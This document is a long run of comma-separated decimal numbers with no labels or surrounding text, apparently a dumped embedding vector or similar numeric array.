0.025800025090575218, -0.03198300302028656, -0.0015767726581543684, -0.0011536673409864306, -0.012975230813026428, -0.026251336559653282, -0.007755051366984844, 0.0021380924154073, 0.012177912518382072, 0.007830269634723663, 0.027439793571829796, -0.012794706039130688, 0.02157273143529892, 0.010267356410622597, -0.0006920123123563826, -0.03616516664624214, -0.0040730941109359264, 0.02217448130249977, 0.03616516664624214, -0.020263925194740295, 0.01541983988136053, 0.002326139248907566, -0.007420327980071306, 0.0004675314121413976, -0.010019134730100632, 0.03878277912735939, 0.002892160089686513, 0.015434883534908295, -0.014276514761149883, 0.010515579022467136, -0.009342166595160961, -0.006874992046505213, -0.014622521586716175, 0.0015701910015195608, 0.003480746876448393, -0.008747938089072704, 0.007747529074549675, -0.009695694781839848, 0.029696354642510414, -0.026702649891376495, -0.006969015579670668, 0.015525146387517452, -0.02142229489982128, -0.0013971879379823804, -0.014788002707064152, 0.004919304978102446, 0.013088059611618519, 0.0036988810170441866, 0.012200478464365005, 0.020053314045071602, 0.01761622726917267, 0.013155755586922169, -0.010252312757074833, 0.0032757758162915707, 0.004817759618163109, -0.03034323640167713, 0.015111442655324936, 0.014788002707064152, -0.006025020498782396, -0.024852268397808075, -0.012177912518382072, -0.006461288779973984, -0.008296625688672066, 0.0006092716939747334, -0.01399820577353239, 0.015434883534908295, -0.011064675636589527, 0.020730283111333847, 0.006972776260226965, 0.0024258040357381105, 0.009996569715440273, 0.00028418577858246863, 0.002595046302303672, -0.0003441256994847208, 0.007514351047575474, 0.00168113864492625, 0.010831497609615326, 0.02107628807425499, -0.005641405005007982, 0.021091332659125328, 0.00959790963679552, -0.01970730721950531, 0.013110624626278877, 0.0023900752421468496, -0.0040166801773011684, -0.009229338727891445, -0.028583116829395294, 0.02963618002831936, -0.010808931663632393, 0.0213320329785347, -0.001611561281606555, 0.005679014138877392, 0.009312079288065434, -0.02393460087478161, -0.015344620682299137, 0.012283219024538994, 0.011230156756937504, -0.016277333721518517, -0.0022998126223683357, -0.0008537325775250793, -0.016021588817238808, -0.01263674721121788, 0.017781708389520645, -0.0020534712821245193, 0.022866494953632355, 0.004046767484396696, 0.01696934551000595, -0.006021259352564812, 0.00505093764513731, 0.011974821798503399, 0.023723987862467766, 0.012561528012156487, 0.011124850250780582, 0.005517293699085712, -0.0026627429760992527, 0.04013671353459358, -0.011538553051650524, 0.007427849806845188, -0.00706679979339242, 0.021587776020169258, -0.016397682949900627, 0.02355850674211979, -0.01981261372566223, -0.013584502972662449, 0.0023957164958119392, 0.0178418830037117, -0.005946040619164705, 0.007123213727027178, 0.011809340678155422, -0.004565776791423559, 0.01612689532339573, -0.017450746148824692, -0.013787593692541122, 0.0019180775852873921, 0.006243154872208834, -0.01611185260117054, -0.0009759630193002522, 0.010447882115840912, 0.006717032752931118, -0.0023731510154902935, -0.014878264628350735, -0.009575344622135162, -0.005942279938608408, -0.005287876818329096, 0.012862402945756912, 0.006032542325556278, -0.00910146627575159, 0.0105306226760149, -0.01957191340625286, -0.0053668562322855, -0.010545666329562664, 0.004174639470875263, -0.01597645878791809, 0.009454994462430477, 0.003574770176783204, -0.006923884153366089, -0.038361553102731705, 0.01647290214896202, -0.016924213618040085, -0.006645574700087309, 0.014915874227881432, 0.0006167935789562762, -0.018443632870912552, -0.012869925238192081, -0.034149304032325745, -0.011350506916642189, 0.01084654126316309, 0.005663970485329628, 0.0010051103308796883, -0.022475356236100197, -0.01746578887104988, -0.0033810818567872047, 0.01907547004520893, 0.002461533062160015, -0.011177503503859043, -0.012749575078487396, 0.022099263966083527, 0.00860502291470766, 0.002884638262912631, -0.0026665041223168373, 0.017691444605588913, 0.008484672755002975, 0.005859538912773132, 0.008966072462499142, 0.01684899628162384, 0.006198023445904255, -0.01189960353076458, -0.01671360246837139, 0.013644677586853504, -0.003247568616643548, -0.00004054759847349487, -0.02121168188750744, 0.005438314285129309, -0.0023487049620598555, -0.014803046360611916, 0.02838754840195179, -0.017330395057797432, 0.012328349985182285, 0.011719077825546265, -0.01612689532339573, -0.010861584916710854, -0.015510102733969688, -0.011004500091075897, 0.006585400085896254, -0.03086976706981659, -0.01934625767171383, -0.006017498672008514, 0.015826020389795303, 0.016036633402109146, -0.016337508335709572, -0.011959778144955635, -0.011568640358746052, -0.0027699298225343227, -0.02540888637304306, -0.007108170073479414, 0.0019650892354547977, 0.029079562053084373, 0.0020478300284594297, 0.007213476113975048, -0.024009818211197853, -0.007698636967688799, -0.02229483239352703, 0.01016205083578825, 0.03243431821465492, 0.01400572806596756, -0.01695430278778076, -0.021106375381350517, 0.0034638226497918367, -0.0092895133420825, 0.0018597830785438418, 0.011064675636589527, -0.0058670612052083015, 0.01102706603705883, 0.016894126310944557, -0.002950454829260707, -0.001060584094375372, -0.02170812524855137, 0.008635110221803188, 0.01809762604534626, 0.008176276460289955, 0.0019406432984396815, 0.002501022769138217, -0.012493831105530262, 0.008010794408619404, -0.006028781179338694, 0.017270220443606377, -0.007371435407549143, 0.018909988924860954, 0.024822181090712547, 0.012223043479025364, 0.01821797713637352, 0.0036161404568701982, 0.010147007182240486, -0.0001177643280243501, 0.0028507898095995188, -0.012426134198904037, -0.0035973358899354935, -0.02638673037290573, -0.009116509929299355, 0.013411499559879303, 0.011576162651181221, -0.003839916316792369, 0.007047994993627071, 0.01600654609501362, -0.008529803715646267, 0.02145238220691681, 0.009176685474812984, 0.005630122032016516, 0.016683515161275864, 0.0030614023562520742, 0.012177912518382072, 0.0034374960232526064, -0.01650298945605755, -0.01660829596221447, -0.011606249958276749, -0.005020850338041782, 0.021166549995541573, 0.013050450012087822, 0.004671083297580481, 0.0038286333438009024, 0.008642632514238358, -0.0003269664302933961, 0.00036504591116681695, 0.0018127714283764362, 0.008454585447907448, -0.007228520233184099, 0.022009000182151794, -0.0016585730481892824, 0.0309901162981987, 0.01016205083578825, -0.0004003046778962016, -0.004945631604641676, -0.008447063155472279, -0.01065097190439701, -0.020970981568098068, -0.004437905270606279, 0.013042927719652653, 0.000226478892727755, 0.014532258734107018, -0.007845313288271427, -0.024957574903964996, -0.004742540884763002, -0.012305784039199352, -0.007051756139844656, -0.007860356941819191, 0.011854471638798714, -0.005667731165885925, -0.0014150523347780108, -0.009402341209352016, 0.0056752534583210945, -0.0012617942411452532, -0.012997796759009361, -0.03258475288748741, -0.005156244151294231, 0.013381412252783775, -0.01600654609501362, -0.00029358812025748193, 0.0025837633293122053, 0.0022828883957117796, -0.009026248008012772, 0.011109806597232819, -0.007683593314141035, 0.023889468982815742, -0.00681481696665287, -0.004099420737475157, -0.009334644302725792, -0.027861017733812332, 0.025348711758852005, -0.006434962619096041, 0.001420693821273744, -0.014276514761149883, -0.0020478300284594297, 0.015449927188456059, -0.00046306531294249, -0.03417938947677612, 0.008943507447838783, -0.012569050304591656, -0.019406432285904884, 0.030644111335277557, -0.00690507935360074, -0.023227544501423836, -0.002085439395159483, 0.01252391841262579, -0.010831497609615326, -0.011771731078624725, -0.015810977667570114, 0.011455812491476536, 0.033667903393507004, 0.006032542325556278, 0.016322463750839233, -0.0078152259811759, -0.00002673790731932968, 0.0000598223959968891, 0.00239947740919888, -0.014411908574402332, -0.014171209186315536, -0.0018870498752221465, 0.036526214331388474, 0.021226726472377777, 0.0017488354351371527, 0.007021668367087841, -0.007356391754001379, 0.005276593845337629, -0.009154119528830051, 0.020263925194740295, -0.013486718758940697, 0.025739850476384163, -0.010259835049510002, 0.010869106277823448, -0.005942279938608408, 0.011877037584781647, -0.0037195661570876837, 0.0061792186461389065, -0.0015589081449434161, -0.014592433348298073, 0.004246097523719072, -0.003399886656552553, -0.0017102858982980251, 0.003885047510266304, 0.01400572806596756, 0.015066311694681644, 0.014569868333637714, 0.007980707101523876, -0.008770504035055637, 0.009620475582778454, -0.012591615319252014, -0.009936394169926643, -0.017179958522319794, 0.012900012545287609, 0.028086673468351364, -0.0011132372310385108, 0.012772140093147755, 0.008228928782045841, 0.0033397115767002106, -0.015690626576542854, -0.006799773313105106, 0.002664623549208045, 0.02018870785832405, 0.011192547157406807, -0.0011480258544906974, 0.003125338349491358, 0.026807956397533417, 0.01624724641442299, 0.016668470576405525, 0.003903852077201009, 0.016939258202910423, -0.018398500978946686, -0.008394409902393818, -0.01708969473838806, -0.012937622144818306, 0.003787263063713908, 0.0020045791752636433, -0.012170390225946903, -0.004949392285197973, -0.0029805421363562346, -0.01357698068022728, -0.001171531737782061, 0.012832315638661385, -0.014050859026610851, 0.002532990649342537, 0.01276461873203516, 0.015826020389795303, 0.03520236536860466, -0.008401932194828987, 0.02232491970062256, 0.011109806597232819, 0.010575753636658192, -0.008086013607680798, 0.000832577352412045, -0.022219613194465637, 0.009838609956204891, 0.01945156417787075, -0.0018513209652155638, -0.021978912875056267, 0.014833133667707443, 0.03261484205722809, -0.004539450630545616, 0.0035315193235874176, 0.005223941057920456, 0.01400572806596756, -0.0002978191478177905, -0.0006962433690205216, 0.0022057893220335245, 0.02393460087478161, -0.007897966541349888, 0.002427684608846903, 0.0008043703273870051, -0.02045949548482895, 0.01758613996207714, 0.0016679753316566348, -0.012727009132504463, 0.0010925520909950137, -0.00379478489048779, -0.01381015870720148, -0.024100081995129585, -0.0010906716343015432, 0.013968118466436863, -0.008213885128498077, -0.00743537163361907, 0.015901239588856697, 0.006739598233252764, 0.003710163990035653, -0.013155755586922169, 0.00019027988309971988, -0.00997400376945734, -0.006491376552730799, -0.02143733762204647, 0.0028338655829429626, 0.003586052916944027, 0.005806886125355959, 0.010041700676083565, 0.005622600205242634, -0.001130161457695067, 0.007363913580775261, -0.0027454837691038847, -0.0020986024755984545, 0.012290740385651588, 0.02405495010316372, 0.01536718662828207, 0.02393460087478161, -0.017871970310807228, -0.011425725184381008, 0.004787672311067581, -0.007634701207280159, -0.013230974785983562, -0.015525146387517452, -0.02130194380879402, 0.011937212198972702, -0.016051677986979485, 0.003142262576147914, 0.015480014495551586, 0.00619426229968667, 0.00023846687690820545, -0.011350506916642189, -0.034660790115594864, -0.02712387405335903, -0.00666061881929636, 0.01773657649755478, -0.002155016642063856, -0.00298806419596076, -0.001529760891571641, -0.01065097190439701, -0.01698439009487629, 0.004787672311067581, 0.012275696732103825, -0.0024051188956946135, -0.0321936160326004, -0.0097934789955616, -0.0027699298225343227, -0.003948983270674944, 0.017420658841729164, 0.02378416247665882, 0.01909051463007927, -0.010026657022535801, -0.010267356410622597, 0.0031573062296956778, 0.021407250314950943, 0.007126974873244762, -0.026612386107444763, -0.009853653609752655, 0.02021879516541958, 0.003508953843265772, 0.0033021022100001574, 0.007627179380506277, -0.0012317067012190819, 0.004411578644067049, 0.023092150688171387, 0.007822748273611069, -0.00458082091063261, 0.011320418678224087, 0.0029184867162257433, 0.011057153344154358, -0.009372253902256489, -0.0146902184933424, -0.008537326008081436, -0.004419100470840931, -0.002096722135320306, 0.006465049926191568, 0.0036330646835267544, 0.015961414203047752, 0.013622112572193146, -0.01084654126316309, -0.005073503591120243, 0.018022408708930016, 0.009432428516447544, -0.005615078378468752, -0.02431069314479828, 0.0014573629014194012, 0.012426134198904037, 0.007548199500888586, 0.02181343175470829, -0.01635255292057991, 0.0018532014219090343, 0.0025800024159252644, -0.011275287717580795, -0.01909051463007927, 0.009003682062029839, -0.004656039644032717, -0.0036875982768833637, 0.0031610671430826187, -0.022039087489247322, -0.01487074326723814, -0.015810977667570114, -0.001590876141563058, 0.012192956171929836, 0.013840246014297009, -0.009725782088935375, 0.009665606543421745, -0.011350506916642189, -0.0031761107966303825, 0.00046447565546259284, -0.008597500622272491, -0.010387706570327282, -0.012644268572330475, -0.018172845244407654, 0.0293804369866848, -0.023483287543058395, -0.010515579022467136, -0.028417635709047318, 0.004437905270606279, 0.007397762034088373, 0.002636416582390666, -0.016803864389657974, -0.011230156756937504, -0.015359665267169476, -0.0042874678038060665, 0.011327940970659256, 0.010741234757006168, -0.0261610746383667, 0.02802649885416031, -0.017270220443606377, 0.004550733137875795, 0.03390860557556152, -0.01468269620090723, -0.018879901617765427, 0.031020205467939377, 0.01699943281710148, 0.0016294257948175073, 0.010432837530970573, -0.005795603152364492, -0.009898784570395947, 0.01994800753891468, 0.0012599137844517827, -0.017902057617902756, -0.004776389338076115, 0.015525146387517452, -0.023227544501423836, -0.003586052916944027, 0.00370452250353992, 0.026838043704628944, 0.016833951696753502, 0.03360772877931595, 0.004204727243632078, 0.02068515121936798, 0.00523898471146822, 0.019421476870775223, -0.02094089426100254, 0.007405283860862255, -0.02352841943502426, -0.00959790963679552, -0.001685839844867587, 0.0061039999127388, -0.008883331902325153, -0.01047044713050127, 0.005682775285094976, -0.006916362326592207, -0.007755051366984844, -0.003268253756687045, 0.02244526892900467, -0.017676401883363724, 0.0051261563785374165, 0.006596682593226433, 0.00644624512642622, 0.004313794430345297, 0.010921759530901909, 0.009154119528830051, 0.001130161457695067, -0.010365141555666924, 0.011463334783911705, 0.0041520739905536175, -0.009537735022604465, -0.02095593884587288, -0.0160968080163002, -0.001620023394934833, -0.013464152812957764, 0.013704853132367134, -0.01555523369461298, 0.015389752574265003, 0.00597612839192152, 0.010455403476953506, 0.024882355704903603, 0.020158620551228523, 0.013163277879357338, 0.002314856508746743, 0.03390860557556152, 0.015480014495551586, -0.009620475582778454, -0.005859538912773132, -0.010034178383648396, -0.002696591429412365, -0.004054289776831865, -0.006995341740548611, -0.007337587419897318, 0.007905488833785057, -0.008432019501924515, -0.0019726112950593233, -0.0035070732701569796, 0.0059309969656169415, 0.012320827692747116, 0.007943098433315754, -0.02789110504090786, -0.01362963393330574, -0.00532924709841609, -0.002831985242664814, 0.014660130254924297, -0.006307090632617474, 0.029515830799937248, -0.013373889960348606, -0.013306193053722382, -0.013155755586922169, -0.01283983699977398, 0.023603638634085655, 0.0062581985257565975, -0.005378139205276966, 0.022881537675857544, -0.008905897848308086, 0.009018725715577602, 0.009297034703195095, 0.009673128835856915, -0.007108170073479414, 0.01436677761375904, 0.012433656491339207, -0.009680650196969509, 0.0024502500891685486, -0.011591206304728985, 0.020655063912272453, 0.02354346215724945, -0.014156165532767773, -0.00011535497469594702, 0.026236293837428093, 0.009575344622135162, 0.029952097684144974, 0.0004553083854261786, -0.0018823487916961312, -0.0048704128712415695, 0.003525878069922328, 0.013968118466436863, -0.018248064443469048, 0.015570277348160744, -0.02665751799941063, -0.013832724653184414, -0.0006656857440248132, 0.001158368424512446, -0.006378548219799995, 0.012734531424939632, 0.006754641886800528, -0.01376502774655819, 0.0034732248168438673, -0.000052946936193620786, 0.028688423335552216, 0.02713891863822937, -0.000587646325584501, 0.04013671353459358, 0.005780559498816729, 0.011666425503790379, 0.019617045298218727, 0.00016007486556190997, 0.01758613996207714, 0.0021719408687204123, 0.0055962735787034035, 0.0010333172976970673, 0.00452816765755415, -0.0015391632914543152, 0.003390484256669879, -0.011305375024676323, 0.009214294143021107, -0.0004940930521115661, 0.004031723830848932, -0.021783344447612762, 0.028688423335552216, -0.015449927188456059, 0.011139893904328346, 0.005223941057920456, -0.0051261563785374165, 0.006837382446974516, 0.009259426034986973, -0.03929426521062851, 0.014712783508002758, -0.015480014495551586, -0.0012194836745038629, 0.031050292775034904, 0.008597500622272491, -0.019496694207191467, -0.013065493665635586, -0.004930587951093912, -0.022024044767022133, 0.008762981742620468, -0.014705262146890163, -0.016698557883501053, 0.002700352342799306, -0.009876219555735588, -0.01686403900384903, -0.004674843978136778, -0.0020083400886505842, -0.018985208123922348, 0.010071787983179092, 0.01597645878791809, -0.041219864040613174, 0.0018635441083461046, 0.018037451431155205, 0.010004091076552868, 0.007627179380506277, -0.01921086385846138, -0.00847715139389038, 0.01363715622574091, -0.003093370236456394, -0.00434012059122324, -0.008770504035055637, -0.016277333721518517, -0.003537160810083151, 0.005806886125355959, -0.021001068875193596, -0.02306206338107586, -0.005536098498851061, 0.01189208123832941, -0.027454836294054985, -0.000012112859621993266, 0.008447063155472279, 0.005280354991555214, -0.004407817497849464, 0.028823817148804665, -0.009936394169926643, 0.03243431821465492, 0.006732076406478882, -0.004750062711536884, -0.028176937252283096, 0.008356801234185696, 0.004174639470875263, 0.003888808423653245, -0.0002320027706446126, -0.028116760775446892, -0.011515988036990166, -0.006344699766486883, -0.01178677473217249, -0.0146902184933424, 0.011358028277754784, 0.003292700042948127, -0.008725373074412346, 0.003428093623369932, -0.0006384190055541694, 0.005144961178302765, -0.0044002956710755825, -0.020414363592863083, -0.003341592149809003, 0.003142262576147914, 0.017014477401971817, 0.007882922887802124, -0.007138257380574942, -0.001848500338383019, 0.0008255255525000393, 0.004475514404475689, -0.00960543192923069, 0.012599137611687183, -0.006126565393060446, 0.0010351977543905377, 0.00613032653927803, -0.0038737645372748375, -0.001158368424512446, -0.006829860620200634, -0.016036633402109146, 0.0012006789911538363, -0.012749575078487396, 0.007582047954201698, 0.00874041672796011, 0.011500944383442402, -0.0016247245948761702, -0.006025020498782396, -0.01760118268430233, -0.018067538738250732, 0.00886828824877739, -0.009026248008012772, 0.007108170073479414, 0.007521872874349356, -0.0067621637135744095, 0.0050622206181287766, -0.0008819396025501192, 0.022986844182014465, -0.00016759673599153757, -0.0015071952948346734, 0.017917102202773094, 0.020053314045071602, 0.0010577633511275053, -0.01761622726917267, 0.001714046811684966, 0.022535530850291252, 0.016818908974528313, 0.010763800702989101, -0.005171287804841995, 0.003219361649826169, 0.00393393961712718, 0.00666061881929636, 0.0005862359539605677, 0.0034262132830917835, -0.006175457965582609, -0.008018316701054573, 0.024446086958050728, 0.02306206338107586, -0.003337831236422062, 0.020594889298081398, -0.002179462695494294, -0.016081765294075012, -0.007913010194897652, 0.0007070560823194683, 0.0039301784709095955, 0.0029372915159910917, -0.01357698068022728, -0.00560755655169487, 0.007570765446871519, 0.009259426034986973, 0.0009656204492785037, -0.013599546626210213, -0.018172845244407654, 0.0021155267022550106, -0.010801409371197224, -0.005897148512303829, -0.001243929727934301, -0.004607147071510553, -0.006017498672008514, 0.004859129898250103, 0.01541983988136053, -0.011493422091007233, -0.010590797290205956, -0.003350994549691677, 0.023949643597006798, 0.00007997866487130523, -0.00479895481839776, -0.006871230900287628, -0.009936394169926643, 0.03357763960957527, -0.00003790318805840798, 0.003745892783626914, 0.008266538381576538, -0.004558254964649677, 0.01575080305337906, -0.0012241848744452, -0.024506261572241783, 0.018022408708930016, 0.015216749161481857, 0.014095989987254143, -0.0006106820655986667, 0.013005318120121956, -0.004005397204309702, 0.01437429990619421, -0.009259426034986973, -0.012004909105598927, 0.0007117572240531445, -0.012057562358677387, 0.030403411015868187, -0.0006346580339595675, -0.00777761684730649, -0.02357354946434498, 0.01189960353076458, 0.01823301985859871, -0.010267356410622597, 0.01195225678384304, -0.005442074965685606, 0.004772628657519817, 0.0012552125845104456, 0.03472096472978592, 0.009688172489404678, 0.00390761299058795, 0.0005843554972670972, -0.0007756931590847671, -0.025965506210923195, 0.014607477933168411, 0.013659721240401268, -0.005573708098381758, -0.005806886125355959, -0.0034619420766830444, -0.0010004091309383512, -0.014584911987185478, 0.003760936437174678, 0.015088877640664577, -0.014885786920785904, -0.008243972435593605, -0.022084219381213188, 0.001501553924754262, 0.013938031159341335, 0.00014350323181133717, 0.0181126706302166, -0.0025724805891513824, 0.010440359823405743, 0.019782526418566704, -0.005795603152364492, 0.00923686008900404, -0.005058459471911192, -0.0007559482473880053, 0.005235223565250635, -0.0011207590578123927, -0.004671083297580481, -0.0022866493090987206, -0.00604006415233016, 0.0033321897499263287, -0.0054834452457726, 0.015337099321186543, 0.006344699766486883, 0.025815067812800407, 0.009530212730169296, -0.005385661032050848, -0.0053969440050423145, -0.024611568078398705, 0.017676401883363724, -0.0171047393232584, -0.002322378335520625, 0.005442074965685606, 0.017390569671988487, 0.011358028277754784, -0.01201995275914669, 0.02167803794145584, 0.011967300437390804, -0.005521054845303297, 0.0019726112950593233, -0.011636337265372276, 0.007442893460392952, 0.034028954803943634, -0.012659312225878239, 0.020369231700897217, 0.006874992046505213, -0.009958960115909576, -0.004881695844233036, -0.020775413140654564, -0.013366368599236012, -0.00350143201649189, -0.0042874678038060665, -0.002427684608846903, -0.003240046789869666, -0.016202114522457123, 0.011937212198972702, -0.0025574369356036186, -0.0004595394420903176, 0.007442893460392952, 0.0033528748899698257, -0.0036669131368398666, -0.005464640911668539, 0.005536098498851061, -0.015570277348160744, 0.021407250314950943, -0.0058444952592253685, -0.02205413207411766, 0.0029560960829257965, -0.0031967961695045233, 0.013742461800575256, 0.013862811960279942, -0.005776798352599144, 0.012328349985182285, -0.0018541417084634304, 0.01244870014488697, 0.0010417794110253453, -0.02191873826086521, -0.029079562053084373, 0.0021004830487072468, 0.0009637399925850332, 0.013592024333775043, 0.006773446686565876, -0.0007145779673010111, -0.007638461887836456, 0.0006327775772660971, 0.0023393025621771812, 0.002549914875999093, -0.008168754167854786, -0.025484105572104454, 0.011094762943685055, 0.018759550526738167, -0.029786616563796997, 0.00526531133800745, -0.022159438580274582, -0.022144393995404243, 0.006799773313105106, -0.00046447565546259284, 0.01585610769689083, 0.001844739424996078, -0.0037853827234357595, -0.0036593913100659847, -0.032675016671419144, 0.0015419840347021818, -0.003742131870239973, -0.0117040341719985, 0.010184615850448608, 0.011305375024676323, 0.008635110221803188, -0.00904881302267313, -0.0027812125626951456, 0.005848256405442953, -0.006100239232182503, 0.01202747505158186, 0.012065084651112556, -0.012245609425008297, 0.008529803715646267, -0.016548121348023415, 0.015201705507934093, 0.033517464995384216, -0.018940076231956482, -0.009387297555804253, 0.004494319204241037, 0.006483854725956917, -0.003749653697013855, -0.013005318120121956, -0.0014451398747041821, 0.00904881302267313, -0.011576162651181221, 0.007668549660593271, -0.025438975542783737, -0.003390484256669879, 0.011124850250780582, 0.011598728597164154, 0.029184866696596146, 0.00860502291470766, -0.0021719408687204123, 0.013125668279826641, -0.002092961221933365, 0.008755460381507874, 0.017330395057797432, 0.020609932020306587, -0.01412607729434967, -0.0020327861420810223, 0.016698557883501053, 0.00423857569694519, 0.0036556303966790438, 0.023408068343997, -0.007619657553732395, -0.03198300302028656, -0.005254028365015984, -0.014118555933237076, -0.005182570777833462, -0.00032297041616402566, 0.013734940439462662, -0.0027642883360385895, 0.022114306688308716, -0.0008617246057838202, -0.00119973870459944, -0.00298806419596076, 0.015810977667570114, 0.017902057617902756, 0.003941461443901062, -0.0032757758162915707, 0.002375031355768442, -0.0029730203095823526, 0.0006059809238649905, -0.013486718758940697, -0.006747120060026646, 0.01097441278398037, -0.009838609956204891, -0.028116760775446892, -0.010455403476953506, 0.02861320599913597, -0.005032133311033249, -0.003774099750444293, -0.03038836643099785, -0.005739189218729734, 0.009650562889873981, 0.012614181265234947, -0.005359334405511618, -0.013095580972731113, 0.0029560960829257965, 0.012990274466574192, 0.01413359958678484, -0.02453635074198246, 0.00009402341675013304, -0.015810977667570114, 0.012283219024538994, 0.003177991369739175, -0.012749575078487396, 0.010951846837997437, -0.011320418678224087, 0.0025743611622601748, -0.008040882647037506, -0.010688581503927708, 0.014426952227950096, 0.02307710610330105, 0.015525146387517452, 0.0014385582180693746, 0.0021568972151726484, 0.009146597236394882, -0.03628551587462425, 0.0031967961695045233, -0.005227701738476753, 0.02378416247665882, 0.0033566358033567667, -0.006442484445869923, -0.015464970842003822, 0.020038269460201263, 0.0010257954709231853, 0.00023165017773862928, -0.005915953312069178, -0.0053179641254246235, 0.014893308281898499, -0.0024746961425989866, -0.012854880653321743, -0.013155755586922169, 0.0027567665092647076, 0.00359169440343976, 0.0005002045654691756, 0.021723169833421707, -0.0025198275689035654, 0.010801409371197224, 0.0034412569366395473, 0.008296625688672066, -0.010425316169857979, -0.0033622772898525, 0.013434065505862236, -0.005972367245703936, 0.015269402414560318, -0.012050040997564793, 0.004163356963545084, -0.011651381850242615, 0.010004091076552868, 0.0048967394977808, 0.00955277867615223, -0.008251494728028774, 0.01972235180437565, -0.029651222750544548, 0.011245200410485268, -0.00011517867824295536, 0.005712862592190504, -0.013464152812957764, -0.034781139343976974, -0.007709919940680265, -0.004501841031014919, -0.013298671692609787, 0.0027266789693385363, 0.00892094150185585, -0.023844337090849876, -0.029184866696596146, -0.015464970842003822, -0.0012909414945170283, 0.012365959584712982, 0.004588342737406492, 0.009139075875282288, 0.021377163007855415, 0.013674764893949032, 0.01060584094375372, 0.018684333190321922, -0.006119043566286564, 0.00619426229968667, -0.005855778232216835, 0.008589979261159897, -0.015224271453917027, -0.00532924709841609, 0.021843519061803818, 0.02331780642271042, 0.002647699322551489, 0.016803864389657974, 0.00006017498526489362, -0.004674843978136778, -0.0019857746083289385, 0.0025198275689035654, 0.004483036231249571, 0.025333669036626816, -0.013509283773601055, 0.012727009132504463, -0.0163675956428051, 0.014028293080627918, -0.015028702095150948, -0.018037451431155205, -0.009590388275682926, 0.010177094489336014, 0.011057153344154358, 0.04097916558384895, 0.015359665267169476, 0.002344943815842271, 0.00402420200407505, 0.014900830574333668, -0.009989047423005104, 0.008409454487264156, 0.00034694638452492654, 0.02155768871307373, 0.021046200767159462, 0.01537470892071724, -0.010981935076415539, -0.022114306688308716, 0.006367265712469816, 0.012320827692747116, 0.0010154529009014368, 0.006694466806948185, 0.02724422514438629, -0.035503242164850235, -0.014103512279689312, 0.0003342532436363399, 0.02691326104104519, 0.003689478849992156, -0.012042518705129623, 0.001546685118228197, -0.027424748986959457, 0.0013746223412454128, 0.04633473977446556, 0.002510425169020891, -0.014614999294281006, -0.0012965828645974398, 0.031080380082130432, 0.010523100383579731, -0.02889903634786606, 0.025935418903827667, 0.017195001244544983, 0.020023226737976074, 0.012629224918782711, -0.0037722194101661444, 0.004268663004040718, 0.0042874678038060665, -0.005464640911668539, -0.0018663647351786494, 0.012426134198904037, -0.010320009663701057, -0.013426543213427067, -0.005178809631615877, 0.006175457965582609, -0.005193853285163641, 0.0004950332804583013, 0.004607147071510553, 0.001077508321031928, 0.005784320179373026, -0.014750393107533455, 0.0057880813255906105, -0.02119663916528225, 0.0005063160788267851, -0.005870821885764599, 0.016442814841866493, -0.027560142800211906, -0.005370617378503084, 0.0059874108992516994, -0.007958142086863518, -0.029515830799937248, -0.003044478129595518, 0.015322055667638779, 0.005554903298616409, -0.016833951696753502, -0.000426396174589172, -0.017450746148824692, 0.0035446826368570328, 0.0027398422826081514, -0.009567822329699993, -0.00805592630058527, 0.005197614431381226, 0.02799641154706478, 0.007469220086932182, -0.0065064202062785625, 0.0008109519258141518, -0.015404796227812767, 0.006092717405408621, -0.0021155267022550106, 0.01239604689180851, -0.010989456437528133, -0.0028940406627953053, 0.03038836643099785, -0.004114464391022921, 0.018172845244407654, 0.03213344141840935, -0.0007112871389836073, 0.004546972457319498, -0.006950210779905319, -0.02006835676729679, -0.017541008070111275, -0.012298262678086758, 0.016187069937586784, -0.0006144429789856076, 0.012561528012156487, -0.008281582035124302, 0.0036010968033224344, -0.010139484889805317, 0.011019543744623661, -0.00021778173686470836, 0.002615731442347169, 0.00532924709841609, -0.007281173020601273, 0.007239802740514278, 0.00997400376945734, -0.020294014364480972, 0.008582456968724728, 0.0035484435502439737, 0.023408068343997, -0.0034901490435004234, -0.014253949746489525, 0.018940076231956482, -0.004588342737406492, 0.007450415287166834, -0.01281727198511362, -0.02381424978375435, -0.03171221539378166, 0.006295807659626007, 0.0002578592102508992, 0.0012147824745625257, -0.02241518162190914, 0.007115691900253296, 0.006720793433487415, -0.01648794487118721, 0.018669288605451584, 0.010568231344223022, 0.003971549216657877, 0.0073676747269928455, -0.023603638634085655, 0.02504783682525158, -0.007296216674149036, -0.0028225828427821398, 0.01505126804113388, -0.01821797713637352, -0.009281991049647331, -0.018428588286042213, -0.0029354109428822994, 0.005682775285094976, -0.008401932194828987, -0.0057091014459729195, -0.005859538912773132, -0.05033637583255768, 0.0047350190579891205, -0.0090563353151083, 0.022009000182151794, 0.01585610769689083, 0.036135077476501465, -0.0032532101031392813, 0.005878343712538481, 0.003236285876482725, 0.014900830574333668, 0.0006553431740030646, 0.009680650196969509, -0.018368413671851158, 0.0011517867678776383, 0.008650153875350952, 0.0005335828755050898, -0.013088059611618519, 0.05126908794045448, 0.011606249958276749, 0.002831985242664814, 0.011576162651181221, -0.005818168632686138, 0.0018748268485069275, 0.01133546233177185, -0.03231396526098251, -0.026446904987096786, 0.012403568252921104, -0.007010385859757662, -0.007469220086932182, 0.02142229489982128, -0.02518323063850403, 0.011267765425145626, -0.008522282354533672, -0.010034178383648396, 0.0006934226839803159, -0.028191979974508286, -0.017014477401971817, -0.006322134286165237, 0.0007333826506510377, 0.016518034040927887, -0.00787540152668953, -0.009545257315039635, 0.024476174265146255, -0.004501841031014919, 0.0117040341719985, 0.0064011141657829285, -0.025845155119895935, 0.01821797713637352, -0.0034939099568873644, 0.009394819848239422, 0.01028240006417036, 0.006487615406513214, 0.010628406889736652, 0.003309624269604683, 0.01921086385846138, -0.0025273493956774473, -0.01326106209307909, -0.023016931489109993, 0.007348869927227497, 0.0019932964351028204, -0.006780968513339758, 0.013907942920923233, 0.003892569337040186, 0.005374378524720669, -0.0004268662887625396, -0.002856431296095252, 0.012223043479025364, 0.009387297555804253, 0.0021080048754811287, -0.01065849419683218, 0.02838754840195179, -0.009898784570395947, -0.004892978351563215, 0.004802715964615345, -0.014720305800437927, -0.003990353550761938, -0.013042927719652653, 0.008635110221803188, -0.013975639827549458, -0.023122237995266914, 0.0008175335824489594, -0.0033603967167437077, -0.013486718758940697, 0.02613098733127117, 0.019902875646948814, -0.022595707327127457, 0.02330276370048523, -0.002734200796112418, -0.0024201625492423773, -0.0044567096047103405, -0.0017967874882742763, -0.030689241364598274, -0.025062881410121918, 0.009447472169995308, -0.00849971640855074, -0.014976048842072487, -0.005502250045537949, -0.01436677761375904, -0.006829860620200634, -0.010545666329562664, -0.004294989630579948, -0.013915465213358402, 